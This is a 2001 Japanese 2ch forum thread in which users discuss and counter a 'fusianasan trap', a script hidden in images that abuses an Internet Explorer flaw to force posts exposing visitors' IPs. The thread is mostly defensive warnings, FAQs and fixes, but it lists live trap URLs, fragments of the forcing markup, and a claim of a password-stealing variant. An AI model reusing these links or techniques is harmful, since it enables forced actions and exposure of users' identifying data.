【危機】フシアナサントラップになんらかの対処を＜２＞

前スレ

フシアナサントラップになんらかの対処を
http://teri.2ch.net/test/read.cgi/accuse/1008569358/

ヽ(`Д´)ﾉ ﾎﾞｯﾁﾝｲ

移動

いらっしゃい

３

４だろ

きょうびひっかかるヤシがいるかよ

９くらい

７

こっちか。

ｺﾋﾟﾍﾟ

ちなみに・・・
Script見てみたけど、ﾘﾌｧ切ってなかったら厨房板にかかれるみたい。
だから、かちゅから見たら云々は無意味。

あと、標準的なJavascriptだし、バグってﾜｹではないから、IEのﾊﾞｰｼﾞｮﾝ云々も
関係ないと思われ。

また、変種も多数出るでしょーね。

ま、私たちド素人は、リンクを不用意に踏まない、もしくは対象をファイルに保存してみて
ＨＴＭＬかどうか確認するくらいしか出来ないかと。

(;´Д`)

ていうか、おさまったと思ってるのはおいらだけ？

>>13
YES

>13
うん。

http://www.annie.ne.jp/~schim/ultima_ratio/joubun/keiho/235.html
ひろゆき警察に連絡して刑法で追い詰めよう。
串刺しててもログが消える前なら追跡できるはず

ひろよし がんがれ！

とりあえず機能不全に陥っていない板では、住人が自主的にage職人になって
良スレを保護することを提案。

厨房板はスレ一覧が23に減りました謎。

CCさくら板糞重いんだけど

テレホタイムが来るYO!

>>13
リファラ対策を厨房板に施したんですか？

>>11が今いいこといった。マジで。

　携帯板でも発生してるよ、ひろゆき

始まった・・・・・

>>13
禿堂

>>20
仕様です

エヴァ板で少し発生しました。
完全に放置されてるけど…

http://teri.2ch.net/eva/

>>ひろよし
ありがとねー。パチ板削除されたみたい。
前スレ見れたらいいんだけど。

厨房板…　また飛んだんじゃないですか？コレ。
http://tmp.2ch.net/kitchen/subback.html

ある意味トラップ
http://choco.2ch.net/test/read.cgi/morningcoffee/1008595959/

すごいね。テロだよ。
これいつから始まったの？

java切っとけば大丈夫なの？

　　　　　　　　　　　＿＿＿＿＿＿＿＿＿＿＿＿＿
　　 ＿＿＿　　　／
　／´∀｀;:::＼＜　　おっす！
/　　　　/::::::::::|　＼＿＿＿＿＿＿＿＿＿＿＿＿＿
| ./|　　/:::::|::::::|
| |｜／::::::::|::::::|

とりあえず一時的にread.cgiとbbs.cgiのリンクoffにしたら？

ほれほれ、テレホだよ！

俺がみたソースでは、リファみてスレ立てるか、レスつける変わるみたいだっ
たけど。

>34
おっす！

スレの名前とかで規制掛けてないの？
１のメール欄内にｆｕｓｉａｎａｓａｎがあったら立てれないとか
おいらみたいなド素人が口出しすることでもないか･･･

2ちゃんねる同時多発テロだ

ハッ！！この中にラディンがいる！！

と、厨房板は一応の対策がなされたっぽい感じ。

つーか重いんですけど･･･

テンプレ改造
　　　　　　　　　　　┌────────┐
　　　　　　　　　　　｜ 　 　 　 　　 　 　 　 ｜
　　　　　　　　　　　｜　緊急警告警報！　|
　　　　　　　　　　　｜ 　 　 　 　　 　 　 　 ｜
　　　　　　　　　　　└──.ヽ(´ー｀)ﾉ──┘
　　　　　　　　　　　　　　　　　(　へ)
　　　　　　　　　　　　　　　　　く
　　対策本部：【危機】フシアナサントラップになんらかの対処を＜２＞[批判要望板]
http://teri.2ch.net/test/read.cgi/accuse/1008597418/

　　ｔｔｐ://obuchi.naikaku.com/angriff/upred/source/1478.jpg 「末尾の数字はいろいろ」
　　http://ｗｗｗ.geocities.co.jp/Milkyway-Gemini/4761/
　これらを 踏むとfusianasanつきで新たに fusianasan付きレス、スレが立つのでクリックしないように！

888 ： ◆7qDGa.4o ：01/12/17 22:55 ID:p6AGor6s
チェッカ作ったよ。
自衛手段講じた人は、ここで試してみて下さい。
「残念ですが・・・」と出た時は、ﾀﾞﾒかもしれづ。
http://www.eucaly.net/~kei/test/check.html

あ、実際には書き込まれません。

祭りだﾜｼｮｲ

厨房板スレ立てようとすると書き込み確認が出続けるのです謎。

前すれで質問あったもので。

チェッカ作ったよ。
自衛手段講じた人は、ここで試してみて下さい。
「残念ですが・・・」と出た時は、ﾀﾞﾒかもしれづ。
http://www.eucaly.net/~kei/test/check.html

あ、実際には書き込まれません。
実際に試してみたけど、引っかからない仕様の時は、真っ白で何も出ません。
　＃Javaが切ってある場合

但し、ブラウザによって表示が変わる可能性がありますが。
引っかかった場合、モナーとレモナな画像が表示されます。

よろしくです。

index.htmlから踏むとレスになって
スレ単体を開いた状態から踏むとスレ立てになるのかな？

ラウンジにスレ立てさせてください

お疲れ。＞1

とりあえずガイシュツな質問まとめろＹＯ！

>>44
ｶﾜｲｲ!

携帯・PHS板　まだ被害少！今のうちに対策を

>>52
駄目ジャン（ｗ

>>48
更に情報が取れない場合（じかﾘﾝなど）は、厨房板にｽﾚ建てられ「た」みたいです。
対策行われたらしいので大丈夫かも知れませんが。

厨房板はfusianasanでスレが立てられなくなったようです。

>>48
逆だと思われ

cgi で URL を link にしない、という対処方法が前スレであったけど、
次善の策としては単純に Location: で飛ばすような CGI をかますようにして、
その CGI 内で blacklist にある URL には飛ばさない、という方法が
考えられるけどどうよ?

Http://foo.bar/baz -> <a href="Http://foo.bar/baz">...
というのを
Http://foo.bar/baz -> <a href="http://2ch.net/jump.cgi?Http://foo.bar/baz">...
という感じにするイメージ。

とりあえず不用意にさわるような輩はこれで対処できるはず。

これ？

955 名前：あった！！ 投稿日：01/12/17 23:01 ID:ct1nExKw
元々はｱｯﾌﾟﾛｰﾀﾞにアップされてたJavascriptが原因。
踏むとﾘﾌｧを拾ってきて、踏んだ元の板に
ｽﾚIDがある場合→ｽﾚにｶｷｺ
ｽﾚIDが無い場合→新規スレッド
を作るみたい。
書き込む内容はそのものが置いてあるURLを書くので、リンク踏む人多数、と。

ｿｰｽがJavascript一本だし、scriptそのものは汎用なので、URLはじいても、他のｱﾌﾟﾛﾀﾞに誰かがアップすると被害が再発する。

対症療法的ではあるが、
１．ﾘﾌｧを検出
２．２行以内の本文を持った新規スレッドは禁止

みたいな感じで、どう？

ちんこtest

対処法としてスレ立て規制かな？後はjavaで警告。

　　　　　　　　　　　┌────────┐
　　　　　　　　　　　｜ 　 　 　 　　 　 　 　 ｜
　　　　　　　　　　　｜　緊急警告警報！　|
　　　　　　　　　　　｜ 　 　 　 　　 　 　 　 ｜
　　　　　　　　　　　└──.ヽ(´ー｀)ﾉ──┘
　　　　　　　　　　　　　　　　　(　へ)
　　　　　　　　　　　　　　　　　く

　　対策本部：フシアナサントラップになんらかの対処を[2ch批判要望板]
　　http://teri.2ch.net/test/read.cgi/accuse/1008569358/
　　サンプル
　　ttp://obuchi.naikaku.com/angriff/upred/source/1478.jpg
　　http://ｗｗｗ.geocities.co.jp/Milkyway-Gemini/4761/
　　http://www.eucaly.net/~kei/test/check.html
　 「拡張子、URLは関係ない！」
　 踏むとfusianasanつきで新たに fusianasan付きレス、スレが立つのでクリックしないように！
　 リファラーが無い場合（かちゅ〜しゃやJAVAスクリプトを切っている）は厨房板にスレが立ちます。
　　とりあえず、リンクを不用意にクリックせずにどうしてもみたい場合は対象にファイルを保存しエディタなどでHTMLじゃないか確かめてください。

ここ？

美容板にも立ってるけど放置されとる。ガイシュツ？
Ｗｅｌｃｏｍｅ ｔｏ 裏２ちゃんねる！
http://life.2ch.net/test/read.cgi/diet/1008595603/
Ｗｅｌｃｏｍｅ ｔｏ 裏２ちゃんねる！
http://life.2ch.net/test/read.cgi/diet/1008595969/

JAVA全部切って>>44に飛んだら
モナーの絵が表示されるのはﾀﾞﾒなの？

Angriffから売られた喧嘩ですか？

>>59
> みたいな感じで、どう？
意味ないようなきがする。

前スレの１０００やるなあ。

>>54
ﾈｶﾏだとは思えんよ(w

おれタブブラウザのDonut使ってるんだけど、セキュリティ項目をすべてオフにしても
<script>ってのは実行されるんだね。
JAVAスクリプトとどう違うの？

前スレ1000ｽｹﾞｪ

　　　　 ／■＼＿_　　　　／￣￣￣￣￣
　　 ／（　´∀｀）／＼　＜　祭りの予感ﾜｼｮｰｲ
　／|￣∪￣∪|＼／ 　 　＼＿＿＿＿＿
　　 | おにぎり.|／
.　　 ￣￣￣￣

>>68
ありがとございます
　　　　　　　　　　　┌────────┐
　　　　　　　　　　　｜ 　 　 　 　　 　 　 　 ｜
　　　　　　　　　　　｜　緊急警告警報！　|
　　　　　　　　　　　｜ 　 　 　 　　 　 　 　 ｜
　　　　　　　　　　　└──.ヽ(´ー｀)ﾉ──┘
　　　　　　　　　　　　　　　　　(　へ)
　　　　　　　　　　　　　　　　　く
　　対策本部：【危機】フシアナサントラップになんらかの対処を＜２＞[批判要望板]
http://teri.2ch.net/test/read.cgi/accuse/1008597418/

　　14.gif 15.gif 20.gif 1478.jpg 「末尾の数字はいろいろ」
　　http://ｗｗｗ.geocities.co.jp/Milkyway-Gemini/4761/
　　http://ｗｗｗ.eucaly.net/~kei/test/check.html
　これらを 踏むとfusianasanつきで新たに fusianasan付きレス、スレが立つのでクリックしないように！

>>64
んなの今さら放置Ｐだよっ！

さっきの1000はお見事!!

>>59
本文３行じゃないの??
>>56
が効果的に見える
２ｃｈ攻撃が目的だったらフシアナ使わない同じ形のスクリプトが出るかも知れないので
もっと効果的な解決案考えるの良いとオモフ

(　ﾟдﾟ)ﾀﾉｼｿｳ･･･　　ﾌﾐﾀｲ･･･

いま　どの板にたくさんありますか?

>>65
> JAVA全部切って>>44に飛んだら
> モナーの絵が表示されるのはﾀﾞﾒなの？
だめですよ。

JavaScriptに関しての結論

IE5.5以降ではアクティブスクリプトをオフにしても無駄
このバグ(仕様?)を利用している。
http://www2.sala.or.jp/~uuu/dhtml/forcescript.html
IE5.01なら問題なし

http://www.ugtop.com/spill.shtml?
引っかからなかった人、ここの
使用ブラウザ Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; ？？？)
ってところ教えて。

>>77
半角、厨房

有名人にリンク

えい>>77

>>76
やめとけよ

>>77
アイドル画像板なんか…
http://www2.bbspink.com/girls/

テロだねー。これぞまさに。
２００１年のニュースとして語り継がれるだろうね。

さて、このテロはなんと名づける？

＞77
オカ板大量です。

>>77
優先順位はあるんだろうけど、早く他の人が言ってる
禁止措置を取らないと。

自分の不注意で引っかかってしまった・・・。

>>77
画像好きな板

素人考えですが
ＣＧＩへのリンク元の拡張子が.jpgとかの画像データだったら蹴るとかは無意味なんでしょうか？

同時多発ｴﾛ

>>85
fusianasan連続多発エロ

これのもとって少年漫画板でしょ？
今回は亜種？

>>77
ヒキ板です！

２ちゃんねる同時多発テロ
普通だなぁ

裏２ちゃんテロ

今回のは、以下のよーなかんじで。

１．ｱﾌﾟﾛﾀﾞなどに貼られたＧＩＦ画像などを踏むと・・・
２．中に仕込まれてるスクリプトが動き出して
３．レスまたはスレが建てられ、ＩＰが晒されます。

よくある質問
１．かちゅーしゃ・直リンなどでは大丈夫？
　　ﾀﾞﾒです。ﾘﾌｧ(転送元URL)が無い場合は厨房板にスレが建ちます
　　なお、既に対策済みとのことですが、どのみち鯖に負担をかけます
２．Java切ってあったら大丈夫？
　　ﾀﾞﾒです。JavaとJavascriptは別物です。
　　IEの場合は、セキュリティレベルを上げましょう。
３．特定URLだけを見てればいいのでは？
　　ﾀﾞﾒです。別のｱﾌﾟﾛﾀﾞなんかにアップロードされると新しいURLができてしまいます。
　　script自体はURLを決め打ちしてないので、どのｱﾌﾟﾛﾀﾞでも動作してしまいます。
　　ｱﾌﾟﾛﾀﾞ側がファイルチェックしてればいいのですが・・・。
４．じゃ、根本的な対処法は？
　　妖しいURLを踏む前に、対象をファイルに保存して中身を確認しましょう。
　　メモ帳などで、ね。
　　もし、HTMLっぽいのが出てきたら、それは罠の可能性が高いですね；


ちなみに、ひろゆき氏を初め管理人群ががんばって対策してるので、そのうちなんとかなるでしょう。

いじょ。

Pink鯖使い物にならないような、、、ただでさえここのところ毎晩酷かったのに。。。

>>80
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

だけどブラウザよりも設定が必要なんじゃないの？

>>79
なるほど……それが原因だったのか…………

前スレ>1000感動した・・かっこいい

　　　　 ／■＼＿_　　　　／￣￣￣￣￣
　　 ／（　´∀｀）／＼　＜　何も知らない厨房が踏みまくり ﾜｼｮｰｲ
　／|￣∪￣∪|＼／ 　 　＼＿＿＿＿＿
　　 | おにぎり.|／
.　　 ￣￣￣￣

これって、前に芸能有名人板（mentai鯖）で起こった現象と同じ？

>>90
IEのバグ(だと思うぞ、強制スクリプト実行なんて)を使って
Refererを偽装しているから無駄

タツタをタツタｱｹﾞ！

テ・レーホ
とはいったものの・・・・

>>105
うまそうだな

今回、２ちゃんねるでおきました一連のfusianasanトラップ事件につきましては、
『２ちゃんねる同時多発テロ』と命名されました

バレたらどうしようもないけど、１つだけちょっとは時間が稼げる方法
はある。が、下手に書くと対策されるから書けない。どうしよう…

>107
うまくないよ

コレってMac（マクモエ）で踏んでも効果あるの？

>　　IEの場合は、セキュリティレベルを上げましょう。
だめです。>>79参照。

Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
で、カスタム設定でActiveXもJAVAも全部切ってても
>>44のチェッカではモナーが表示されましたが

>>109
ひろゆきにメール

>>79
すげー

>>99
さんくす。どうやらjavascriptOFFでもダメなようで。
パッチ、当てたのになあ。
Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; T312461)

オカルト板にも多いな。

>>110
やっぱり（ｗ

>>110
いつから脳人になった？

Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

>>113
モナーが表示されるのは正常
ダイアログが出なければOK

というわけで。

とりあえず、ＴＯＰに警告の文章書き込んだらどう？＞ひろゆき

祭りにﾜｸﾜｸしてるけど、ドラクエしたいので落ちます
きっときゃ被害もなし

>>104
てことは特定URLからの起動だけ受け付けも意味無いって事ですな。

過去１０スレ以内に同じ名前のスレが立ってたら立てれないとかどうでしょう？
スレの名前ランダムで変えられたら終わりだけど･･･

２ちゃんねる同時多発えろ

>>97
ニュー速板に転載しました。

とりあえず、ここらで風呂でも入ってこよう

----------ここまで読んだ---------

>>114
送ったことないよ〜〜（ちょっとコワい（笑））メルアド知ってます？？

なるほど・・IEの「仕様」という名のバグなのか・・（バグじゃない？
どうりでJAVAScript切っただけではだめなのね・・

>>111
マク関連は情報少ないからかなり不安だね。
さすがに試せないし・・・

トラップあるアプロダ（タツタだっけ）の管理者にメールして
その画像を削除してもらったの？ひろゆきさん？

厨房とまった?

だから、作った奴警察に突き出して
見せしめにするのが一番いいんだって。

>>128
その答えが「仕様」

>>79
javaScriptオフだとxmlが動いてどうのこうの
ではなかったかと。

おいおいこのスレのおかげでまちがえてふんじまったじゃないか

>>111
マクモエっていうかマカーには無意味っぽい

じゃあ、>>78の情報が間違いってことか

だから
1.　ＩＥで２ちゃんの板から直リン→その板にスレ立て
2.　１以外→厨房にスレ立て

こうなるから。

>>131
そのようで。

>>127
いたずらはいやづら

>>131
止まってますね
ありがとさんです

>>129,136
了解

>>140
あ、わかった。ちょっと送ってみるっす。

>>92
採用

IE５．０１なら大丈夫なん？

これはやっぱり個人による仕業？
それとも、クラッカーみたいな組織でやった事？

実況板で確信犯的に立ててるやつがいます。
規制してほしい・・・

ななしんと名乗る荒しがたてたスレ
http://biwa39.he.net/~ch2live/test/read.cgi?bbs=endless&key=1008595442

http://biwa39.he.net/~ch2live/test/read.cgi?bbs=endless&key=1008595164

http://biwa39.he.net/~ch2live/test/read.cgi?bbs=endless&key=1008595368

<noscript>
<xml:namespace prefix=t />
〜

コレだ

>>137
そう。対応してないブラウザでは<noscript>と<img>だけが
残るようなソースになってるからどんなブラウザでも
画像は出る。

>>129
おれ半角板で踏んじまった（IEforMac
何もおこらず、厨房板も確認したけどなし
確実に関係ないかはわからんが

>>113
あーあ、ﾀﾞﾒだね。セキュリティレベル高にしても実行されてしまう。
ちなみに開発環境はIE6なんだけど・・・。

とりあえづチェッカは以下。夕食時に踏んだけどスレ立て規制引っかかって助かった・・・。
http://www.eucaly.net/~kei/test/check.html
実際には2chには迷惑をかけない・・・と思います。

>>145
否。

>148
それだ。

>>145
大丈夫じゃない

>>131
おつかれ〜。
しかし、エロられてんだかわからん板やね

マックは安全って聞いたんだけど、本当なんですか？

>>148
それだね

　　　　 ／■＼＿_　　　　／￣￣￣￣￣
　　 ／（　´∀｀）／＼　＜　ﾃﾚﾎで厨房増大 ﾜｼｮｰｲ
　／|￣∪￣∪|＼／ 　 　＼＿＿＿＿＿
　　 | おにぎり.|／
.　　 ￣￣￣￣

・ひっかかるブラウザ
IE及びIEコントロールを用いているブラウザ
Windowsで動く２ちゃん専用ブラウザの殆ど
（かちゅーしゃで踏むと厨房板にスレッドが立つ）

・対策
IEのバージョンが5.5未満の場合は
JavaScriptを切ればよい
IE5.5以降ではIEのバグにより
JavaScriptを切ってもスクリプトが実行されてしまうので
有効な対処法はない

>>156
まぁ、踏まないのが一番。

ツークラテロ（ﾜﾗ。

>>137
> じゃあ、>>78の情報が間違いってことか
どゆこと？

>>147 live とまった?

if ($referer =~ /xxx\.2ch\.net\/.*/)
↓
if ($referer =~ /^http\:\/\/xxx\.2ch\.net\/.*/)
こんな感じに修正すればいいはず。

質問する前にちょっとでもログ遡ってみてね。
大体の質問にはレス付いてるから。

厨房板がとまったってことは、かちゅはOKってことか？

【衝撃！！裏２ちゃんねるは実在した!!】
http://muvc.net/ura2ch/main.html
http://user.memberz.to/active/ura2/
http://www.2ch.net/の“2ch”の前に“ura”
と入れてもＯＫ(ＮＧワードなので直リン貼れません)

[ニュース速報]　※警告※裏2ｃｈのリンクを踏むな
http://choco.2ch.net/test/read.cgi/news/1008577522/
↓だそうな

834 名前： 投稿日：01/12/17 22:52 ID:ic7RLSxJ
このプログラムを応用したら、プロバのパスワード表示されるようなのできたんだけど・・・
やばくね？
846 名前：834 投稿日：01/12/17 22:57 ID:ic7RLSxJ
パスワードが入ってるiniファイルを開いて、暗号解除して、
そのデータを自動ＦＯＲＭするだけ

>>79
あ、漏れIE5.01SP2だ。やた
>>134
って、ダメなの？

昼過ぎからしばらく見てなかったので、状況がよくわからん

情報まとめてローカルルールで
ラウンジとか効果の無い板を除く全板に注意喚起
とかできないの？

>>156
とりあえづチェッカ通してみて、aleat画面（ポップアップウィンドウ）出てきたら×

対策してもすぐに隙をつかれそうな予感・・・

http://www2.sala.or.jp/~uuu/dhtml/forcescript.html
のスクリプト書いても何も出てこないのに
http://www.eucaly.net/~kei/test/check.html
だと怒られる・・

違う手法なのか？

同名ｽﾚを規制してください

ただこれ、「kitchen」のとこ変えたらすぐに他板に
被害及ぶから…

早く全板で暫定措置を実施しないと。

>>168
もはや2chだけの問題じゃないのか……？

>>163
今のところ被害はそんなにありません

>>162
絵が表示されるだけなら大丈夫ってこと
メッセージボックスが出るとだめ

マクは大丈夫かもって報告もあるけど
確認とれるまでは俺らマカも
大丈夫だろう、って試しに踏んだりしないように
気をつけましょ

厨房板、スレ乱立は止まったけど暴走してる人が数名いるよ（ｗ

われわれはテロなんかに屈しない！（半ベソ）

>>163
http://live.2ch.net/dancesite/

には残骸が残ってます、、、っていうか実況関係スレ少ない。

もう　全部とまった?

ちょっと落ち着いた・・・？

(　ﾟдﾟ)ﾌﾐﾀｸﾅｯﾃｸﾙ･･･

＞176
それがほんとならとんでもないもの出来ちまったな

>>179
さすがにもう踏んでないよ（半角で踏んだ時はなにもなし
ローカルでソース確認とかはしてみたりするけど
とりあえず、了解

Show the Flog!

どこの板のどのスレが最初にはじまったのかなぁ

一応全部とまったかな？

チェッカ。
http://www.eucaly.net/~kei/test/check.html

スクリプト直したから、OKの時は絵は出ない・・・はず。
というか対策されたらしいから、このページいらなくなったかな？

guest guest
Ｗｅｌｃｏｍｅ ｔｏ 裏１ちゃんねる！
ttp://koizumi.naikaku.com/angriff/upred/source/1478.jpg

止まったみたいですね。

マカー用。で、
http://www.eucaly.net/~kei/test/check.html
を踏んでも、IEのからウインドウが開いて終わり。

>>191
>>192
　　　　　　　　　　　┌────────┐
　　　　　　　　　　　｜ 　 　 　 　　 　 　 　 ｜
　　　　　　　　　　　｜　緊急警告警報！　|
　　　　　　　　　　　｜ 　 　 　 　　 　 　 　 ｜
　　　　　　　　　　　└──.ヽ(´ー｀)ﾉ──┘
　　　　　　　　　　　　　　　　　(　へ)
　　　　　　　　　　　　　　　　　く
　　対策本部：【危機】フシアナサントラップになんらかの対処を＜２＞[批判要望板]
http://teri.2ch.net/test/read.cgi/accuse/1008597418/

　　14.gif 15.gif 20.gif 1478.jpg 「末尾の数字はいろいろ」
　　http://ｗｗｗ.geocities.co.jp/Milkyway-Gemini/4761/
　　http://ｗｗｗ.eucaly.net/~kei/test/check.html
　これらを 踏むとfusianasanつきで新たに fusianasan付きレス、スレが立つのでクリックしないように！

>>192
新手？

>>186
「ターミネーター２」だね

あ、なんとかなったのかな？メール送ったけど無駄だったかな？
ま、いいや（笑

>>168
それが事実なら、ＭＳは株価大暴落するな…

やられたぜ･･･

>>191
このブラウザは安全です。

でもfusianasanだとスレ立たないっていうのが対策なら
すぐに変種が出回りそうな予感…

半角は落ち着いたけど、今また発生してる

ウソ↓

834 名前： 投稿日：01/12/17 22:52 ID:ic7RLSxJ
このプログラムを応用したら、プロバのパスワード表示されるようなのできたんだけど・・・
やばくね？
846 名前：834 投稿日：01/12/17 22:57 ID:ic7RLSxJ
パスワードが入ってるiniファイルを開いて、暗号解除して、
そのデータを自動ＦＯＲＭするだけ

fusianasanに騙されたリアル厨房が怒り狂った挙げ句、猛勉強して今回のスクリプト組んだようだな。
↓ネタ元スレ、本人降臨中
ttp://teri.2ch.net/test/read.cgi/bobby/990629621/

>>192
>>200
白痴？

このトラップによって立ったスレは削除してくれないの？
モーコー板に20スレほどあるんだけど・・・。

>>192
「1ch.tv」ね

>>195
>>191のリンクはスレ立たないぞ

>>207
削除は鯖の負担になるから一旦放置

>>204
それなら大丈夫だね

>208　あう、・・・。

>>191
だめだって･･･はぁ

>>207
削除は後回しでしょ。

とりあえずは恒久的対策を立てないと。

クリックしたら自動的に「【警告】裏2chの>>1ｻｿの画像をクリックするな」という
スレを立てるスクリプト作りましたが、
状況が状況なのでアップするのやめときます。

よしひろがんばれ！！

Ｗｅｌｃｏｍｅ ｔｏ 裏しゃねる！
http://tmp.2ch.net/test/read.cgi/kitchen/1008599238/

>>216
ﾁｮﾄﾜﾗﾀ

>>216
ﾜﾛﾀ

ヽ(´ー｀)ﾉﾏﾀｰﾘ

>>216
ﾜﾗﾀ

こいつが犯人と言う噂がある

＞実況板より。

16 名前：ななしん 投稿日：01/12/17 23:01
URL踏んだやつが勝手にIP晒してスレ立てるんだよ（藁
漏れはアドレス貼っただけー　みんなじゃんじゃん踏んでね?

このななしんってやつが実況の発端なんですがなにか対処できなんでしょうか？
あきらかに遊び半分でやってます・・・

落ち着いたな。

これでJavaScriptをOffにして>>44のチェッカを踏んだら
「このブラウザは安全です。 」って出た。

ああそうか、かちゅーしゃも中身はIEだからな…。

>>215
前スレで出た双子の弟は「ひろよし」だよ（ｗ

http://www.watch.impress.co.jp/internet/www/article/2001/1217/iebug.htm
とかのパッチ当てるとへいきとか？

クリックするほうが悪いんじゃ。。。
ネットやってるからには全てユーザーサイドの自己責任。
管理側に対策を求めるな。削除活動だけでも申し訳ないのに。

>>221
そりゃあ告訴しか・・・

2ch厨房連続誤爆テロ

>>225
あれ？まさよしじゃなかったか？
三つ子？四つ子だっけ？

あれ書いたやつここ読んでるんでねえか

つか、IEなんか使ってる時点で厨房な訳だが．．．

http://www.1ch.com/

>>227
真性のアフォですか？

ご参考までに。
今回のは、以下のよーなかんじで。
１．ｱﾌﾟﾛﾀﾞなどに貼られたＧＩＦ画像などを踏むと・・・
２．中に仕込まれてるスクリプトが動き出して
３．レスまたはスレが建てられ、ＩＰが晒されます。
よくある質問
１．かちゅーしゃ・直リンなどでは大丈夫？
　　ﾀﾞﾒです。ﾘﾌｧ(転送元URL)が無い場合は厨房板にスレが建ちます
　　なお、既に対策済みとのことですが、どのみち鯖に負担をかけます
２．Java切ってあったら大丈夫？
　　ﾀﾞﾒです。JavaとJavascriptは別物です。
　　IEの場合は、バグを使っているので、セキュリティレベルを上げても無駄です。
　　細心の注意を払ってください。
３．特定URLだけを見てればいいのでは？
　　ﾀﾞﾒです。別のｱﾌﾟﾛﾀﾞなんかにアップロードされると新しいURLができてしまいます。
　　script自体はURLを決め打ちしてないので、どのｱﾌﾟﾛﾀﾞでも動作してしまいます。
　　ｱﾌﾟﾛﾀﾞ側がファイルチェックしてればいいのですが・・・。
４．じゃ、根本的な対処法は？
　　妖しいURLを踏む前に、対象をファイルに保存して中身を確認しましょう。
　　メモ帳などで、ね。
　　もし、HTMLっぽいのが出てきたら、それは罠の可能性が高いですね；
５．自分のPC大丈夫？
　　チェッカ作りました。以下で確認しましょう。もし、モナーの絵が出てきたら×です。
　　http://www.eucaly.net/~kei/test/check.html
　　なお、このチェッカはスクリプトをそのまま利用してますが、BBS登録部分を無効化しているので、実際には書き込まれません。

ちなみに、夜勤氏を初め管理人群ががんばって対策してるので、そのうちなんとかなるでしょう。

いじょ。

>>226
それあててもだめだった

>>221
そいつか。
そういえばメール欄に0入れてる奴この前半角でみたな・・・

>>227
これだけ大きなサイトなら当然責任もある

>>230
とにかく多重子なんだよ（ｗ

「たえこ」ではないぞ

とりあえず威力業務妨害で刑法側と
損害賠償で民法側から攻めれる。

>>232
今時IEﾕｰｻﾞは厨房なんて論点を持つやつが厨房。

MS01-58は関係ない。
IE5.5&6の「仕様」

カギは
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
かな？

>>235
>>79

>>241
禿同。

>>239
そうか。了解した。
とりあえず頑張れ！美枝子！！

犯人つかまってホスイ
怖いよー　ｶﾞﾀﾌﾞﾙ･･･
効果的な対応策があったら教えてホスイよー

今、夜勤さんとか運営側のみなしゃんはどんなことををやってるでつか？

2ch同時テロですか？

>>204
安心したよさんきゅ

ま、１回くらい訴えて晒しあげた方がいいんじゃない？

とりあえず、うまい棒を食べてたりします。

>>248　同時エロです

IEでスクリプト切ってても勝手に実行されるとしたら大問題じゃないか？

>>251
チーズ味

もはや祭りだな

>>246
寝る。

fusianasan連続同時エロだっけ。

>>251
ひろゆきさんてのんきなんですね・・・・・

>>251
そういや、ハラ減ったな。

>>251
一人だけﾏﾀｰﾘしないでくれ

>>251
がんがってください。

ついでにきゅうり踊りもやってください。

>>251
腹減ってきたじゃないかよぅ……

>>251
つーか、名前は「同時多発エロ」にしてちょ

>>251
あなた…やっぱ管理人だわ（硝酸

>>251
好きだねぇ。

>>242
Proxomitronで何とかなる？

>>251
( ﾟдﾟ)ﾎﾟｶｰﾝ

タツタ以前の形跡はあるんか？
あすこにないはずのgifがあったのがそもそも怪しげな発端だろ？

>>251
食べたいです・・・。

>>251
コーンポタージュなら僕もいま食べてます。

たこやき味くいたくなったよ。

>>253
禿同。
何の為のセキュリティ設定なのか分からんちん。

>>251
うまい棒箱飼い？

2ちゃんねるの隠語（出典：『2典』）

うまい棒→警察
食べる→連絡

ttp://piza2.2ch.net/test/read.cgi/pachi/1008598921/l50
緊急削除依頼m(__)m

>>251
うまい棒食べながらPC触るとキーボードとかに油つきません？

>>251
何味？ひろゆきー

もう１０年近く食べてないな、うまい棒…

>>251
俺も買ってこよ。

>>251は影武者

有名人にリンク

えい>>251

きつねうどん食べてます

>>235
忘れがちですが、普通のHTMLにスクリプトが書いてある可能性もあります。

>>251
( ﾟдﾟ)ﾎｽｨ…

すんご
ひろゆきめちゃめちゃつっこまれとる

>>251
暇だったらついでにメルマガでも発行してよ。

>>251
納豆味だろっ？！そーなんだろっ？！！

わーいひろゆきだー

>>251
ﾜﾗﾀ！

お絵かき掲示板にアップロードされただけであって
タツタは全く無関係です

>>282
お疲れ様

>>251
(;´Д｀)…

お前ら！甘やかすな！

>>282
( ﾟдﾟ)ﾎﾟｶｰﾝ

>>282
七味忘れずに

>>282
夜勤さんまで･･

結局これって対策どうするんですか？

>>282
うどんも食べたいです・・・。

夜食スレはここですか？

簡単に亜種が作れるから早く対策練った方がいいと思う
>>251
誕生日に美味い棒１０００円分送ろうか？

>>282
折れにも食わせろぉ・・・

夜勤ﾀﾝ

あのお絵かきBBSのアップロードの仕方がわからんかった…

タツタ以前の形跡はあるんか？
あすこにないはずのgifがあったのがそもそも怪しげな発端だろ？

>>297
どうするっすかねー

>>282
確かにそうですね。ちょっと書き直してきます。
それでは、逝って来ます；＿；

>>276
うまい棒は袋をもって食べるので手に油はつかないと思い。

ひろよし にも食べさせてやってくれ

>>299
そのようで。ちなみに俺はUFO食ってる。

ひろゆき。。。。。。(;´Д｀)…ﾊｱﾊｱ｡｡

(▽Д▽)y ─┛~~
餓死寸前の漏れが一生懸命トラップ対策考えてるときにうまい棒やらきつねうどんくってるとは。

ピュアAU板でもこの被害が続出中。

>>282
どんべぇ?

>>235で確認したが、どうやら俺は引っかかってるようだ･･･鬱
マジで駆除して欲しいＹＯ！

http://choco.2ch.net/test/read.cgi/news/1008578562/85
ｼﾞｮｰｼﾞ･ﾌﾟｯｼｭ ◆dees2Brg ：01/12/17 22:24 ID:xrtqiwRn
12月17日、言論の自由の敵は２ちゃんねるに戦争を始めた。２ちゃん
ねるの本土が攻撃されたのはニッ●イ事件以来だ。
数百万人の一般２ちゃんねらーの安心感を奪ったのは、『タ●タの部屋』
というテロサイトだ。彼らの目的は極端な考えを２ちゃんねるの人々に
押し付けることだ。指導者（サイト管理者）はBi●lobeにアカウントを
持つ「普段は化学系営業マン・タ●タ」である。
２ちゃんねらーは次のことをタ●タに要求する。『タ●タの部屋』のブラ
クラ製作者を２ゃんねらーに引き渡し、謝罪すること。半角板住人を含む
ＩＰをさらされている２ちゃんねらー個人情報のサルベージ。テロリストの
訓練ネット環境を閉鎖し、２ちゃんねらーに立ち入り調査をさせることだ。
